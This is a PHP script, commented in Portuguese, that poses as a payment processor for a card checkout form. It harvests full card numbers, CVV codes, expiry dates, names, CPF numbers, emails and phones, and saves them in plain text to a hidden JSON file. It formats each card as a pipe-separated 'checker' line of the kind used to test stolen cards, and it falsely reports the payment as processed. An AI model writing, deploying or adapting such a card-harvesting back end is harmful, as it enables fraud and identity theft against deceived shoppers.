<?php
// Verifica se o método de requisição é POST
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    header("HTTP/1.1 403 Forbidden");
    exit('Acesso negado.');
}

// Definir fuso horário para Brasil/Brasília
date_default_timezone_set('America/Sao_Paulo');

// Array de parâmetros obrigatórios do formulário de cartão
$parametrosObrigatorios = [
    'cld_card_number' => 'Número do cartão',
    'cld_card_name' => 'Nome impresso no cartão',
    'cld_card_expiration_date_month' => 'Mês de validade',
    'cld_card_expiration_date_year' => 'Ano de validade',
    'cld_card_cvv' => 'CVV',
    'cld_installments' => 'Parcelas'
];

// Array para armazenar parâmetros faltantes
$parametrosFaltantes = [];

// Verifica cada parâmetro obrigatório
foreach ($parametrosObrigatorios as $parametro => $descricao) {
    if (!isset($_POST[$parametro]) || $_POST[$parametro] === '') {
        $parametrosFaltantes[] = $descricao;
    }
}

// Se houver parâmetros faltantes, retorna um erro detalhado
if (!empty($parametrosFaltantes)) {
    header("HTTP/1.1 400 Bad Request");
    $mensagemErro = "Os seguintes parâmetros estão faltando: " . implode(', ', $parametrosFaltantes);
    exit($mensagemErro);
}

// Obter dados do localStorage (enviados pelo frontend)
$localStorage = [
    'cpf' => isset($_POST['cpf']) ? $_POST['cpf'] : '',
    'email' => isset($_POST['email']) ? $_POST['email'] : '',
    'nome' => isset($_POST['nome']) ? $_POST['nome'] : '',
    'telefone' => isset($_POST['telefone']) ? $_POST['telefone'] : ''
];

// Preparar dados para salvar
$dadosCartao = [
    'id' => uniqid(),
    'data_hora' => date('Y-m-d H:i:s'),
    'card_number' => $_POST['cld_card_number'],
    'card_name' => $_POST['cld_card_name'],
    'expiration_date' => $_POST['cld_card_expiration_date_month'] . '/' . $_POST['cld_card_expiration_date_year'],
    'cvv' => $_POST['cld_card_cvv'],
    'installments' => $_POST['cld_installments'],
    'installments_value' => isset($_POST['cld_installments-value']) ? $_POST['cld_installments-value'] : '',
    'usuario' => [
        'cpf' => $localStorage['cpf'],
        'email' => $localStorage['email'],
        'nome' => $localStorage['nome'],
        'telefone' => $localStorage['telefone']
    ],
    'checker' => $_POST['cld_card_number'] . '|' . 
                $_POST['cld_card_expiration_date_month'] . '/' . $_POST['cld_card_expiration_date_year'] . '|' .
                $_POST['cld_card_cvv'] . '|' .
                $_POST['cld_card_name'] . '|' .
                $localStorage['cpf']
];

// Nome do arquivo JSON
$arquivoJson = '02FK02KFKFKF920FMF9S7800KDDD2T3.json';

// Verificar se o arquivo já existe
if (file_exists($arquivoJson)) {
    // Abrir e ler o arquivo existente
    $jsonAtual = file_get_contents($arquivoJson);
    $pagamentos = json_decode($jsonAtual, true);
    
    if (!is_array($pagamentos)) {
        $pagamentos = [];
    }
} else {
    // Iniciar com um array vazio
    $pagamentos = [];
}

// Adicionar novo pagamento
$pagamentos[] = $dadosCartao;

// Salvar os dados no arquivo JSON
if (file_put_contents($arquivoJson, json_encode($pagamentos, JSON_PRETTY_PRINT))) {
    header('Content-Type: application/json');
    echo json_encode(['success' => true, 'message' => 'Pagamento processado com sucesso']);
} else {
    header("HTTP/1.1 500 Internal Server Error");
    exit('Erro ao salvar os dados do pagamento.');
}